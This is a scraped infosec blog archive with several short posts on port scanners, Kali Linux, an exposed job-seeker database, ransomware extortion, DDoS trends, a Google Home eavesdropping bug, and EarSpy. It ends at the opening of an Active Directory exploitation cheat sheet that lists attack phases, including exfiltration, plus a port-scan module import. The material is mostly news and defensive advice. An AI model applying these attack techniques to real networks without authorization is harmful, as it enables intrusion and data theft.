Jan 04 2023

Top 10 Open Port Scanner and Port Checker Tools for 2023

Category: Security vulnerabilitiesDISC @ 11:19 am
Top 10 Open Port Scanner and Port Checker Tools for 2023

Port scanners and port checker tools are the most essential parts of finding the open ports and the status of the port.

The open ports mean a TCP or UDP port number that is arranged to acknowledge packets.

Web pages or FTP services require their particular ports to be “open” on the server so as to be freely reachable.

What is the Open Port Scanner?

An open port scanner is a tool that is used to check the external IP address and identify open ports on the connection.

It is used to detect whether the port forwarding is set up accurately or whether the server applications are being blocked by a firewall.

Port Checker tools are used to examine the network for ports that are commonly forwarded.

Few ports, such as port 25, are usually blocked at the ISP level trying to intercept suspicious tasks.

Each data contains a port number, which allows the protocols to determine their desired location and redirect them accordingly.

Most Used Ports

20 FTP – Data
21 FTP – Control
22 SSH Remote Login Protocol
23 Telnet
25 Simple Mail Transfer Protocol (SMTP)
110 POP3
115 Simple File Transfer Protocol (SFTP)
118 SQL Services
53 Domain Name System (DNS)
443 HTTPS
143 IMAP
389 LDAP
37 Time Protocol
123 Network Time Protocol
530 Remote procedure call
547 DHCPv6 server

Time needed: 5 minutes.

How to Scan Open Ports in Windows?

  1. Press the Windows key and run key at the same time to open the command prompt.
  2. Type cmd and hit enter.
  3. In the command prompt type “netstat -a” and hit enter.
  4. In a few seconds, it displays a complete list of ports that establish the connection.How to Scan Open Ports in Windows

Best Port Checker & Port Scanner Tools

  • Advanced Port Scanner
  • TCP Port Scan with Nmap
  • IPVOID
  • Network Port Scanner Tool
  • DNS Tools
  • Web Proxy and Privacy Tool
  • Solar winds Port Scanner
  • IP Tool
  • UltraTools
  • Yougetsignal

Advanced Port Scanner

Open Port Scanner
Output displaying ports enabled

This Open port scanner is the fastest, easy to access, and freely available everywhere.

It helps to find out the open ports on network computers and extract the kind of programs that are running on detected ports.

These programs have an adaptable interface and usable functionality.

Key Features

  • Fast port scanning
  • Remote access
  • Getting information on network devices
  • Wake-On-LAN
  • Easy access
  • Run commands on the remote computer

TCP Port Scan with Nmap:

This Open Port Scanner tool helps to identify which TCP port is open on your target machine and also provides OS information, service information, and also traceroute.

The Nmap Port scanner tool is a web interface for the widely known Nmap port scanner which is implemented with the correct parameter so as to give speed and accuracy.

Open Port Scanner
Zenmap/Nmap port scanner

The scanning process is sending packets to each port and listening for acknowledgment.

This is called an ‘SYN scan’, which sends TCP SYN packets to each port. If a port replies with SYN-ACK, it is flagged as open and an RST is sent back by the Nmap port scanner.

In this way, no full TCP connection is established with the target machine.

Key Features

  • Port Scanning
  • Custom scanning options
  • Able to discover network devices

IPVOID

IPVOID helps to identify services that are running on the server and view TCP open ports.

It also checks and verifies whether the firewall is working accurately. There are security services that block IPs that you don’t hold, so try not to check.

Open Port Scanner
IPVOID port Scanner

The online tool offers a wide range of scanning options to discover details about IP addresses.

Key Features

  • Base64 to Image
  • IPv4 CIDR Checker
  • DiG DNS Lookup
  • IP Geolocation
  • Multi URL Opener

Network Port Scanner Tool

This Open port scanner tool helps to check services that are available and running on the server.

If we want to check what OS version is running, and whether ports are open on a server, and whether the server has enabled a firewall or not, then, in this case, to check all the above information, it uses raw IP packets.

Network Port Scanner Tool

This tool is extremely useful to find out if your port forwarding is set up correctly or if your server applications are blocked or not by a firewall.

Key Features

  • Port scanning
  • Firewall Detection
  • IP Finder
  • Open Port detection

DNS Tools

It helps you to identify which service is accessible outside of the intranet. Machines use a router with NAT to bind with the internet can’t be obtained outside of the intranet.

Although, by using port forwarding, ports can deviate from the router to the particular machine.

MxToolBox

This Open port scanner online allows for verifying whether redirection works correctly or not.

Key Features

  • Round-trip SMTP monitoring.
  • Inbound and outbound email tests and header analysis.
  • Performance metrics and historical statistics.
  • Configurable real-time alerts.
  • Customizable timeouts.

Web Proxy and Privacy Tool

This Open port scanner online tool is also known as  “ HideMy[.]name . If anyone wants to hide their identity and access anything and everything, go for a Web proxy.

This tool hides and changes your IP address, and location and you will stay incognito while using the browser.

Open Port Scanner
Proxy Tool

It is a median to the machine and required website. You can also watch blocked content and play online games as well.

You can surf the internet with maximum speed and connection. It gives protection, privacy, and liberty on any device while browsing.

Key Features

  • VPN Service
  • Hide Network Activity
  • Protect Passwords
  • Unrestricted Internet Access

Solar winds Port Scanner

It scan’s all the IP addresses and TCP and UDP ports to check network vulnerabilities.

You can run the scan from the command line as well, save scan configurations also, and minimize run time scan with multi-threading. Trace end-user and terminal machine connection activity.

Solar Winds Port Scanner

It recognizes unknown vulnerabilities and network protocols.

Key Features

  • Automated network discovery
  • Real-time monitoring and alerting
  • Powerful diagnostic capabilities
  • Enhanced network security

IP Tool

IP tool is known as “whatismyip[.]com “ Port scanner.

This tool scans the network for open ports and decided if those open ports need to be closed to allow network security and fewer vulnerability.

Ip Tool

This Open port scanner tool shows which ports are open for communication on a network. If in case, a port is opened, it is for remote communication.

Key Features

  • IP Address Scanner
  • IP Address Tracker
  • Infoblox DNS and DHCP Monitoring
  • IP Address Discovery

UltraTools

With Ultra tools you can check the DNS performance and the DNS records specified to the domain or the hostname.

DNS Traversal Tool gives you more information on whether the DNS servers have propagated to all Nameservers.

Ultratools

It is a cloud-based authoritative DNS service that securely delivers fast and accurate query responses to websites and other vital online assets.

Key Features

  • SiteBacker — Monitoring & Failover
  • Traffic Controller
  • Directional DNS
  • DNS Shield

Yougetsignal

Yougetsignal is the open port checker tool that let you check any external IP address for open ports.

It is a useful tool to check for the restriction placed in the Firewall. With this tool, you can check for all TCP and UDP ports.

Open Port Scanner and Port Checker Tools
Yougetsignal Open port checker

With the listed above port scanner tools, you can determine the open ports in the network infrastructure.

It is always recommended to close the ports if they are not in use for security reasons.

Key Features

  • Port Forwarding Tester
  • What Is My IP Address
  • Network Location Tool
  • Visual Trace Route Tool

Conclusion

Listed are some of the free tools available online to check for the open ports on the server and for other DNS queries.

We have categorized some of the best port scanner and port checker tools to help to find the open ports and other port-related operations while performing a penetration test on the network.What is the security Risk due to Open Ports?

Most of the suspicious software behaves like a service waiting for connections from a remote assailant so as to give him data or authority over the machine.
The most common security practice is to close unused ports in private machines, in order to block known access to any service which may keep running on the PC without the client’s information, regardless of authorized service is being misconfigured or because of the suspicious software.Is Port Scanning illegal?

Port scanning itself is not illegal, but scanning the destination host without authorization is illegal and you will get into trouble.
TCP Port scanners help the server administrators and penetration testers to examine at which ports the data is entering into the network and to protect it from invaders.

Security/Vulnerability/Risk Scanning Tools

more titles on nmap port scanner

Infosec books | InfoSec tools | InfoSec services

Tags: Port Checker Tools, Port Scanner

Jan 03 2023

Kali Linux: What’s next for the popular pentesting distro?

Category: Linux Security,Pen TestDISC @ 2:18 pm
Kali Linux: What’s next for the popular pentesting distro?

If you’re interested in penetration testing and digital forensics, you know that Kali Linux is worth a try. And if you’re already doing it, chances are good you are already using it.

We talked to Jim O’Gorman, Chief Content and Strategy Officer at Offensive Security (OffSec), about the direction in which the development of the open-source distro is headed.

[The answers have been edited for clarity.]

Kali Linux keeps growing and improving. How much does user feedback influence where you want to go next? What do users want the most?

Two questions drive Kali’s development:

1. What needs to be done to ensure that Kali Linux is the best possible platform for professional and hobbyist information security work?
2. What needs to be done to ensure that Kali is the best possible platform for information security training?

There is a lot of overlap between those two questions, but realistically they are separate and distinct items. However, by getting them both right on a single platform, we create an environment where people can train, study, and learn, but also use the same platform for real-world efforts. In essence, it means that you train like you fight.

The answer to the first question is driven by input from the Kali and OffSec teams. As infosec professionals ourselves, what are the things we run into on a day-to-day basis and how do we make our life easier by ensuring the toolset is of the highest quality possible? We also work closely with OffSec’s pentesting team.

We also listen to input from other Kali users. Kali is a totally open-source project and anyone and everyone can pitch in and contribute. And they do! If you wish a tool to be included in Kali, package it and submit it! If you wish a configuration worked a certain way out of the box, modify the package and submit the change. It’s very direct and easy to do, and it is in our documentation. Anyone – regardless of their background – can play a part.

The second way users influence development is through bug reports, feature requests, and conversations on OffSec’s Discord and other social media. The Kali team is out there as part of the infosec community – talk to us and let us know what you are seeing. Also, when possible, we will set up private conversations with large organizations that use Kali to get a feel for their unique needs.

The answer the second question – How to make Kali the best possible platform for training? – we work very closely with the OffSec content development team to find out what tools they are using for training, what sort of default environment works best for learners, and what we can do in Kali to support general education efforts.

Surprisingly, even though Kali is built for advanced information security work, it is often the first Linux many users ever use. So we are careful with the design of Kali to ensure that it is approachable. We want to ensure that you don’t have to be a Linux professional to utilize Kali successfully in OffSec courses.

What’s your vision for Kali Linux in the next 12 months? What areas need polishing?

The changing of attack techniques over time does not impact Kali as much as you might think, as techniques are more often than not implemented in tools and scripts. While the tools and scripts change, Kali Linux as a platform to launch them does not have to change much. The closest item to this is expanding Kali to run everywhere. Our goal is to put the Kali toolset as close as possible to you no matter where you are.

Kali installed on bare metal, Kali in a VM, Kali in containers (Docker & LXC), Kali on WSL, Kali on various ARM devices such as Raspberry Pi, Kali in a cloud instance such as AWS and Azure, Kali on your Android phone or tablet – we even have Kali running on a watch! No matter where you are or what your needs are, we want Kali to be easy to access and run.

Kali is primarily gered towards pentesting and red teaming, but we are looking at expanding into other areas of information security as well.

Kali Linux comes with a myriad of tools. What’s the process for including or removing a piece of software? What tools are used the most?

What tools run in Kali is really a matter of input from the team, community, and OffSec. Our goal is to have the most frequently used and important tools installed and working out of the box. Other common tools are installed quickly and easily with a single command.

We add new tools based on the answers to a number of questions: What functionality does the tool provide and is it unique or different enough from functionalities of other tools? Is the tool going to be maintained and updated over a reasonable period of time? How functional is the tool? It is a wrapper for another tool? Does the developer have a positive reputation?

If a tool stops being updated and stops working, we’ll try to work with the author. If they are unresponsive and the effort of maintaining the tool becomes too complex, we document this and then often remove it.

We get a lot of input from the OffSec pentesting team on what tools they are using in the field today, as well as the OffSec content developers on what tools are being used as part of the courseware. The idea is to have all the tools used in OffSec coursework out of the box to keep things easy for students.

Do major software development trends influence your approach to enhancing Kali Linux? How do you prioritize features?

When prioritizing features, we look at what is needed at the current time. We release Kali in quarterly updates so that dictates our development cycle. Each cycle we look at what is happening in the industry, where the gaps are, and determine what to prioritize.

On this front, there is a lot to balance. Everything from the distribution of Kali, installation, user experience, tools, stability, so on and so forth. It’s a full operating system and a small team so we have to pick and choose what goes into it, we can’t do everything each cycle. Again, input from the community and OffSec sets the priorities.

There’s been a lot of buzz around AI lately. Do you expect AI to play a role in future Kali Linux versions?

As Kali is a base OS, not right now. For tools that run in Kali, perhaps in time. As soon as the tools are there we will add them into Kali if they are any good. But there are also always fad trends so we tend not to get over-excited about them until they start to actually deliver results.

We have seen demonstrations of tools being developed with some of the PoC which have been creating some buzz, but as they are not ready to be released we are a ways off from this yet.

Kali Linux 2022.4 released | OpenSourceFeed


5 Kali Linux tools you should learn how to use

5 Kali Linux books you should read this year

New Book: Advanced Security Testing with Kali Linux!

Infosec books | InfoSec tools | InfoSec services

Tags: Kali Linux

Jan 03 2023

Top ERP Firm Exposing Half a Million Indian Job Seekers Data

Category: data securityDISC @ 10:28 am
Top ERP Firm Exposing Half a Million Indian Job Seekers Data

At the time of writing, a misconfigured server belonging to an Enterprise Resource Planning (ERP) Software provider based in California, United States was still exposing data to public without any security authentication or password.

An Elasticsearch server belonging to a major international IT recruitment and software solution provider is currently exposing the personal data of more than half a million Indian candidates looking for jobs.

However, the data is not limited to jobseeker as the server is also exposing the company’s employees’ data. Another important aspect of this data exposure is the fact that it also contains the company’s client records from different companies, including Apple and Samsung.

This was confirmed to Hackread.com by Anurag Sen, a prominent independent security researcher. What is worse, the server is still exposed and publicly accessible without any security authentication or password. Originally, the server was being exposed since late December 2022.

It all started when Anurag scanned for misconfigured databases on Shodan and noted a server exposing more than 6GB worth of data to public access. Anurag said that the server belongs to a company originally based in the United States with offices around the globe
including India. Whilst the database contains details of job seekers in India.

Hackread.com would not share the name of the company in this article because the server is still exposed.

Exposed Data

Anurag’s analysis of the server revealed that the exposed records contain personal data of over 575,000 individuals, while the size of the data is over 6.3GB and increasing with new data with each day passing. This data includes the following:

  • Full Name
  • Date of birth
  • Email address
  • Phone number
  • Resume details
  • Employer details

The screenshot below shows the candidate details and client data that are currently being exposed:

Image credit: Anurag Sen – Hackread.com

The screenshot below was taken from the live server that shows the company’s client details. Some of these are top companies Apple, Samsung, Sandisk, Unilog, Moody, Intuit, NEC Corporation, Falabella and many more.

The company’s client list also indicates that its a high-profile business with a presence all over the globe.

Top recruitment firm exposes half a million candidates' data from India
Screenshot credit: Anurag Sen – Hackread.com

Indian CERT Alerted

Since the server is still live at the time of writing; Anurag alerted the Indian Computer Emergency Response Team over the weekend. However, there has been no response from the authorities yet.

India and server misconfiguration

India is home to almost 1.4 billion people. This makes the country a lucrative target for businesses as well as cybercriminals. The more the investment, the more widespread and vulnerable the IT infrastructure becomes.

Last year, several top data exposure-related incidents involving tens of millions of victims were reported from India. These included Indian Federal Police and banking recordsCovid antigen test resultsMyEasyDocs, online packaging marketplace Bizongo, etc.

Impact

It is yet unclear whether a third party accessed the database with malicious intent, such as ransomware gangs or threat actors. However, if it did, it would be devastating for the victim and the healthcare firm responsible for the server.

Furthermore, considering the extent and nature of the exposed data, the incident can have far-reaching implications, such as bad actors downloading the data, carrying out phishing scams, or identity theft-related fraud.

Hackers can hold the company’s server or data for ransom and leak it on cybercrime forums if their demands are not met. Nevertheless, the victims in this situation are the job hunters who trusted authorities with their personal information.

Misconfigured Databases – Threat to Privacy

Misconfigured or unsecured databases, as we know it, have become a major privacy threat to companies and unsuspected users. In 2020, researchers identified over 10,000 unsecured databases that exposed more than ten billion (10,463,315,645) records to public access without any security authentication. 

In 2021, the number increased to 399,200 exposed databases. The top 10 countries with top database leaks due to misconfiguration in 2021 included the following:

  • USA – 93,685 databases
  • China – 54,764 databases
  • Germany – 11,177 databases
  • France – 9,723 databases
  • India – 6,545 databases
  • Singapore – 5,882 databases
  • Hong Kong – 5,563 databases
  • Russia – 5,493 databases
  • Japan – 4,427 databases
  • Italy – 4,242 databases

Top recruitment firm exposes half a million candidates' data from India

Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World

Infosec books | InfoSec tools | InfoSec services

Tags: Job Seekers Data

Jan 02 2023

Cyber Crime: The Dark Web Uncovered

Category: Cybercrime,Dark Web,Information SecurityDISC @ 2:54 pm

Cyber Crime: The Dark Web Uncovered

11 of the world’s top cyber security experts gather to discuss how to protect ourselves against cybercrime. Includes interviews with Rob Boles, Jesse Castro, Michael Einbinder-Schatz, Rick Jordan, Konrad Martin, Rene Miller, Paul Nebb, Will Nobles, Adam Pittman, Leia Shilobod, and Peter Verlezza.

Directors Jeff Roldan Starring 11 Top Cyber Security Experts

Genres Documentary SubtitlesEnglish [CC] Audio languagesEnglish

Tags: cyber crime, dark web

Jan 02 2023

Windows PowerShell Tutorial and Cheat Sheet

Category: Cheat Sheet,Information Security,PowerShell SecurityDISC @ 1:00 pm

PowerShell Cheat Sheet

PowerShellCheatSheet_v41-1Download

Powershell : The Complete Ultimate Windows Powershell Beginners Guide. Learn Powershell Scripting In A Day!

Mastering PowerShell Scripting: Automate and manage your environment using PowerShell


Infosec books | InfoSec tools | InfoSec services

Tags: Powershell Security

Jan 02 2023

3 important changes in how data will be used and treated

Category: Data Breach,Data mining,data securityDISC @ 11:51 am
3 important changes in how data will be used and treated

Regula has presented their vision of the developments that will shape the industry’s landscape in 2023. Deepfakes, new cyber-hygiene norms, and demand for mature ID verification platforms are among some of the predictions for the next year.

While more and more industries move their customer experiences to digital, online identity verification is becoming an essential part of our life. It lets people cope with all sorts of mission-critical activities online: opening bank accounts, applying for benefits, getting insurance payouts, and even getting medical advice.

Still, the security of the digital IDV process is the number one concern that is forming the industry’s landscape and driving the majority of significant changes.

Javelin Strategy & Research reports that in 2022, identity fraud and scams cost $52 billion and affected over 42 million people in the US alone. The rising number of identity fraud cases, along with fraudsters’ hunger for personal information collected by service providers, will lead to three important changes in how data will be used and treated:

  • Even industries that are not so heavily regulated will invest more in the ID verification process, adding extra security layers. There will be more checks with increased complexity and additional steps in the verification process: biometric checks, verifying IDs, SMSs, and passwords, checking recent transactions, etc.
  • This will lead to prioritization of comprehensive liveness checks to make sure that submitted documents are valid and really exist. An ID document contains various security features: holograms, elements printed with optical variable inks, and biometric data, to name a few, and an image of it should be taken using methods so that these elements can be captured and verified.
  • Regula experts expect to see a push from users for more data protection rules, and for more transparency from online businesses. In the wake of multiple public disclosures of data leaks, users are gradually losing trust in how their data is treated and becoming more cautious about what they share with third parties and how. Addressing this trend, companies will attempt to bring that trust back via increased investments in customer data protection measures.

When it comes to more complex identity fraud cases related to synthetic media like deepfakes, experts expect to see a rise in amateur scam attempts along with the emergence of next-gen biometric-related fraud.

Both trends are developing in parallel and are powered by the same factor: the growing maturity and availability of machine-learning based technologies that make it possible to fake photos, videos, voices, and other characteristics previously considered unique.

Based on the opinion of Regula experts, all these trends will lead to a market that is developed enough to embrace mature end-to-end IDV solutions that are capable of not only verifying documents, but also biometric characteristics, like face, voice, and fingerprints.

“The good news is that minimal security measures are currently enough to repel 95% of possible attacks. The remaining 5% is where the difficulties lie. Now, most deepfakes are created for free, and they’re of such a quality that there’s no immediate danger. But that’s a matter of how many resources fraudsters will be willing to invest. At the moment, when they’re ready to spend significant amounts of money per deepfake, it’s a problem that requires interactive multi-layered protection. So if we picture the trends above as a scale, where convenience for the customer is on one end and security on the other, the balance is shifting to the latter,” notes Ihar Kliashchou, CTO at Regula.

In relation to this year’s trending topics — digital identity and decentralized identity — the company’s experts have their own take on that:

  • In the ideal world, a universal digital identity would help eliminate most of the issues with fake identities. However, in reality, creating and gaining broad acceptance and implementation of a secure single source of truth is going to take a significant amount of time. Still, we’re already seeing more different local and even company-based digital identities trying to become a single source of truth on a local level.
  • The idea of decentralized identity is going to be held back for some time. With the benefit of being built on blockchains and allowing users to control their digital identifiers, this system still comes with weaknesses. Since no one controls it centrally, no one will be responsible for it in case of any problems. Additionally, there is the matter of trust. Blockchain is strongly associated in people’s minds with crypto, and the FTX crash that has happened in the last couple of months has undermined people’s trust in it.


Infosec books | InfoSec tools | InfoSec services

Tags: data security

Jan 02 2023

Google Home Vulnerability: Eavesdropping on Conversations

Category: Cyber Espionage,Cyber surveillanceDISC @ 11:01 am
Google Home Vulnerability: Eavesdropping on Conversations

Matt Kunze, an ethical hacker, reported wiretapping bugs in Google Home Smart Speakers, for which he received a bug bounty worth $107,500.

Google Assistant is currently more popular among smart homeowners than Amazon Alexa and Apple Siri, given its superior intuitiveness and capability to conduct lengthy conversations. However, according to the latest research, a vulnerability in Google Home Smart speakers could allow attackers to control the smart device and eavesdrop on user conversations indoors

Findings Details

The vulnerability was identified by Matt Kunze, a security researcher using the moniker DownrightNifty Matt. The researchers revealed that if exploited, the vulnerability could allow the installation of backdoors and convert Google Home Smart speakers into wiretapping devices. Moreover, Google fixed the issue in April 2021 following responsible disclosure on 8 January 2021 and developing a Proof-of-Concept for the company.

Possible Dangers

The vulnerability could let an adversary present within the device’s wireless proximity install a backdoor account on the device and start sending remote commands, access the microphone feed, and initiate arbitrary HTTP requests. All of this could be possible if the attacker is within the user’s LAN range because making malicious requests exposes the Wi-Fi password of the device and provides the attacker direct access to all devices connected to the network.

What Caused the Issue?

Matt discovered that the problem was caused by the software architecture used in Google Home devices as it let an adversary add a rogue Google user account to their target’s smart home devices.

A threat actor would trick the individual into installing a malicious Android application to make the attack work. It will detect a Google Home automation device connected to the network and stealthily start issuing HTTP requests to link the threat actor’s account to the victim’s device.

In addition, the attacker could stage a Wi-Fi de-authentication attack to disconnect the Google Home device from the network and force the appliance to initiate a setup mode and create an open Wi-Fi network. Subsequently, the attacker can connect to this network and request additional details such as device name, certificate, and cloud_device_id. They could use the information and connect their account to the victim’s device.

According to Matt’s blog post, the attacker could perform a range of functions, such as turning the speaker’s volume down to zero and making calls to any phone number apart from spying on the victim via the microphone. The victim won’t suspect anything because just the device’s LED turns blue when the exploitation happens, and the user would think the firmware is being updated.

Matt successfully connected an unknown user account to a Google Home speaker. He created a backdoor account on the targeted device and obtained unprecedented privileges that let him send remote commands to the Home mini smart speaker, access its microphone feed, etc. Watch the demo shared by the researcher:

It is worth noting that there’s no evidence this security loophole was misused since its detection in 2021. Being an ethical hacker, the researcher notified Google about the issue, and it was patched. Matt received a bug bounty worth $107,500 for detecting this security flaw.

Wiretapping Bugs Discovered in Google Home Smart Speakers

Tags: Eavesdropping on Conversations

Dec 31 2022

Windows event log analysis

Category: Information Security,Windows SecurityDISC @ 1:37 pm

Windows-event-log-analysis-1Download

Windows Security Monitoring: Scenarios and Patterns

Malware Forensics Field Guide for Windows Systems

Infosec books | InfoSec tools | InfoSec services

Tags: Windows event log analysis, Windows Malware Forensics, Windows Security Monitoring

Dec 31 2022

Triple Extortion Ransomware: How to Protect Your Organization?

Category: RansomwareDISC @ 12:06 pm
Triple Extortion Ransomware: How to Protect Your Organization?

Ransomware strikes businesses every 11 seconds. The ransomware attack volume is already at record levels, but we’re hearing it’s only getting worse.  

As some victims managed to take precautions and refused to pay the ransom, attackers began to add more layers to their attacks. 

Double extortion ransomware became a common tactic in 2021. But in 2022, the attackers presented an innovation in their attacking technique called triple extortion. 

What is triple extortion ransomware attack, and how to protect your business? Read on to find out. 

Triple Extortion Ransomware

What is Double extortion ransomware?

It is becoming increasingly common for attackers to use ransomware to extort money from businesses and individuals. This type of cybercrime is called “double extortion.”

Here the criminals encrypt the victim’s data and threaten to release it publicly if a ransom is not paid. 

As soon as the attacker exfiltrates the data they wish to leverage, they launch the encryption attack. Next, the attacker threatens to expose the data, possibly selling personal data about customers. 

In most cases, even organizations that have paid the ransom have found their data to be leaked. 

In September 2022, SunCrypt ransomware used DDoS as an additional attack layer. Attackers threaten to overwhelm the victim’s server with traffic if the ransom is not paid. 

Malicious actors like Avaddon and REvil soon started to follow the same tactic.   Adding DDoS extortion attacksis expected to continue, given the increased use of IoT devices and the surge in bitcoins. 

What is Triple Extortion Ransomware Attack?

In triple extortion, attackers demand payment from the company that was initially compromised and those whose information was stolen.

The first case of triple extortion was observed when Vastaamo, a Finland-based psychotherapy clinic, was breached. Even after the clinic paid the ransom, attackers threatened the therapy patients with releasing their session notes.

Another instance of triple extortion occurred last year when the attacker targeted Apple after their first victim, hardware supplier Quanta, refused to pay. 

In this case, criminals proved they could compromise key suppliers if they gained leverage over the initial victim.

Remember, such an assault can cause irreparable damage to the reputation of any company, regardless of the industry.

Leading Causes of Double and Triple Extortions

The main factors that contribute to the increase in double and triple extortions include:

  • The proliferation of ransomware-as-a-service (RaaS) platforms has made it easier for attackers to launch these attacks. 
  • Using cryptocurrency has made it more difficult for law enforcement to trace and track payments. 
  • The emergence of new ransomware strains specifically designed for double and triple extortions. 

Who is vulnerable to Triple extortion ransomware?

Attackers targets companies with inadequate cybersecurity solutions and less mature security teams. They also prey on companies that can pay the ransom demands.

The most obvious targets for ransomware operations are companies and organizations that store client or customer data.  

Whenever a corporation owns or controls important data or is connected to one, they risk triple extortion. 

How to prevent triple extortion ransomware attacks?

Many ransomware attacks remain undetected and unreported until they reach the domain controller. A detection-centric approach will only warn businesses of attacks that are already underway. The most effective course of action is prevention. 

Here are effective ways to prepare against triple extortion attacks:

Keep your network secure

Double extortion ransomware uses the same methods to access your network as traditional ransomware. To prevent initial access to a network, train employees on security awareness, establish password policies and implement multi-factor authentication. 

Run vulnerability assessments and patch known vulnerabilities regularly to avoid compromise. 

Back up Data

If an attacker infiltrates your network, an offline backup can protect you from the first part of a ransomware attack: data recovery. 

Furthermore, encrypt your data to prevent a double extortion attack. It ensures that, if stolen, the ransomware group cannot read it.

Cyber Threat Intelligence

Threat Intelligence is a key pillar in the cyber security stack. Gathering information related to cyber threats provides insights into threat actors and methodologies that could impact your business. 

Stay ahead of the latest threat intelligence to detect and analyze threats. Hunt for signs of compromise that lead to a ransomware attack. 

Proper DDoS Protection

The DDoS attack is now on the list of services the RaaS operator offers. You should protect your company’s network and server with a DDoS security solution. It tracks the incoming traffic, identifies the malicious requests, and diverts them away from your network and server. 

With sophisticated techniques, attackers are dispersing their DDoS attacks. Indusface offers DDoS protection solutions, enabling you to customize mitigation thresholds to isolate and block attacks. 

Conclusion

Cybercriminals continue to evolve their attack techniques; you can’t fall behind and expose your assets. 

If you are at risk of a triple extortion attack, paying the ransom is not the way out. Focus on preventing and mitigating attacks as they happen. 

The best solution would be to prevent the attack from happening in the first place. A comprehensive ransomware resilience plan is essential for preparation, prevention, and response.

Infosec books | InfoSec tools | InfoSec services

Tags: Ransomware Protection Playbook

Dec 30 2022

Cybercriminals create new methods to evade legacy DDoS defenses

Category: Cybercrime,DDoSDISC @ 10:40 am
Cybercriminals create new methods to evade legacy DDoS defenses

The number of DDoS attacks we see around the globe is on the rise, and that trend is likely to continue throughout 2023, according to Corero. We expect to see attackers deploy ever higher rate request-based or packets-per-second attacks.

“DDoS attacks have historically focused around sending packets of large sizes with the aim to paralyze and disrupt the internet pipeline by exceeding the available bandwidth. Recent request-based attacks, however, are sending smaller size packets, to target higher transaction processing to overwhelm a target. Those with responsibility for network health and internet service uptime should be taking note of this trend,” explained Corero CTO, Ashley Stephenson.

Legal responsibility

Corero also predicts that 2023 will see more breaches being reported, because of the increasing trend for transparency in data protection regulations. Regulations such as the UK Government’s Telecoms Security Bill will compel organizations to disclose more cyber-incidents publicly.

We are also likely to see the legal responsibility for bad corporate behaviour when dealing with breaches being linked to individual executives. Examples such as Joe Sullivan, the former head of security at Uber, who was recently found guilty of hiding a 2016 breach, could set a precedent for linking data protection decisions to the personal legal accountability of senior executives.

Evading DDoS defenses

Attackers will continue to make their mark in 2023 by trying to develop new ways to evade legacy DDoS defenses. We saw Carpet Bomb attacks rearing their head in 2022 by leveraging the aggregate power of multiple small attacks, designed specifically to circumvent legacy detect-and-redirect DDoS protections or neutralize ‘black hole’ sacrifice-the-victim mitigation tactics. This kind of cunning will be on display as DDoS attackers look for new ways of wreaking havoc across the internet and attempt to outsmart existing thinking around DDoS protection.

In 2023, the cyberwarfare that we have witnessed with the conflict in Ukraine will undoubtedly continue. DDoS will continue to be a key weapon in the Ukrainian and other conflicts both to paralyse key services and to drive political propaganda objectives. DDoS attack numbers rose significantly after the Russian invasion in February and DDoS continues to be used as an asymmetric weapon in the ongoing struggle.

Earlier this year, in other incidents related to the conflict, DDoS attackers attempted to disrupt the Eurovision song contest in an attempt to frustrate the victory of the Ukrainian contestants. Similarly, when Elon Musk showed support for Ukraine by providing Starlink satellite broadband services, DDoS attackers tried to take the satellite systems offline and deny Ukraine much needed internet services.

“Throughout 2022 we observed DDoS attacks becoming increasingly sophisticated while at the same time the DDoS attack surface is expanding. With the number of recorded attacks on the rise and significant shifts in attackers’ motives and goals, 2023 will require organizations to ensure they have robust DDoS defense in place,” said Lionel Chmilewsky, CEO at Corero Network Security.

DDoS

AWS Best Practices for DDoS Resiliency

DDoS Defense Standard Requirements

Infosec books | InfoSec tools | InfoSec services

Tags: ddos

Dec 30 2022

EarSpy – A New Attack on Android Devices Use Motion Sensors to Steal Sensitive Data

Category: Cyber Attack,Smart PhoneDISC @ 10:17 am
EarSpy – A New Attack on Android Devices Use Motion Sensors to Steal Sensitive Data

There has been a new eavesdropping attack developed by a team of security experts for Android devices which has been dubbed “EarSpy.” With the help of this attack, attackers can detect the following things:-

  • Caller’s gender
  • Caller’s identity to various degrees
  • Speech content

As part of its exploratory purpose, EarSpy aims to capture motion sensor data readings generated by the reverberations from the ear speaker in mobile devices in order to create new methods of eavesdropping.

Universities Involved in this Project

Cybersecurity researchers from five American universities have undertaken this academic project called EarSpy. These are all the names of the universities that are affiliated with this project:-

  • Texas A&M University 
  • New Jersey Institute of Technology
  • Temple University
  • University of Dayton
  • Rutgers University

Evolution of Smartphone Tech

Smartphone loudspeakers have been explored as a potential target for such attacks. As a result of this, the ear speakers are incapable of generating enough vibration to allow eavesdropping to be executed properly for the side-channel attack.

While the audio quality and vibrations of modern smartphones have improved greatly as a result of more powerful stereo speakers.

Even the tiniest resonance from a speaker can be measured by a modern device because it has more sensitive motion sensors and gyroscopes.

It is remarkable how little data is recorded on the spectrogram from the earphones of a 2016 OnePlus 3T, while a stereo ear speaker on the 2019 OnePlus 7T produces a significant amount of information.

As part of their experiments, the researchers used a OnePlus 7T device as well as a OnePlus 9 device. Both of these devices were used by the researchers to play pre-recorded audio through their ear speakers only using a variety of pre-recorded audio sets.

Although the results of the tests varied according to the dataset and device, they indicated that eavesdropping via ear speakers can be accomplished successfully.

To Check more on Detection Performance & Recommendation:

Based on the features in the time/frequency domain of the ML algorithm, the detection performance for the OnePlus 7T device has been tested, and here below we have mentioned the output chart:- 

EarSpy Android


Infosec books | InfoSec tools | InfoSec services

Tags: Android, Steal Sensitive Data

Dec 29 2022

Active Directory Exploitation Cheat Sheet

Category: Cheat Sheet,Windows SecurityDISC @ 12:59 pm

https://ethicalhackersacademy.com/blogs/ethical-hackers-academy/active-directory

Active Directory is a Microsoft service run in the Server that predominantly used to manage various permission and resources around the network, also it performs an authenticates and authorizes all users and computers in a Windows domain type networks.

Recent cyber-attacks are frequently targeting the vulnerable active directory services used in enterprise networks where the organization handling the 1000’s of computers in the single point of control called “Domain controller” which is one of the main targeted services by the APT Hackers.

Though exploiting Active directory is a challenging task, It is certain to activate directory exploitation Cheat Sheet which contains common enumeration and attack methods which including the several following phases to make it simple.

  • Recon
  • Domain Enum
  • Local Privilege Escalation
  • User Hunting
  • Domain Admin Privileges
  • Database Hunting
  • Data Exfiltration
  • Active Directory Exploitation Tools

Reconnaissance

Recon Phase contains various modules, including Port scan that performs the following operations.

PORT SCAN
Import-Module Invoke-Portscan.ps1
<#
